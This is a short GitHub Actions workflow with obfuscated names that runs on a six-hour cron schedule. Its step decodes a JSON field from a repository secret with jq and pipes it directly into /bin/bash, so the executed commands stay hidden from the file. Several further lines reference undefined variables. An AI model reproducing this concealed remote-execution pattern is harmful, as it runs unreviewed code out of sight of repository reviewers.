name: huiqianhq
on:
  workflow_dispatch:
  schedule:
    - cron: '50 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huiqianhq
        env:
          znths9917: ${{ secrets.znths9917 }}
        run: |
          echo $znths9917 | jq -r .pfwj63 | /bin/bash
          echo $a280 | jq -r .ab13 | /bin/bash
          echo $pwhvf590 | jq -r .fjxpf92196 | /bin/bash
          echo $cnonb191 | jq -r .bzotn2 | /bin/bash
          echo $uznxf09581 | jq -r .yiazk3775 | /bin/bash
          echo $wn76163 | jq -r .ocygy54 | /bin/bash
          echo $zgnte50438 | jq -r .p4597 | /bin/bash

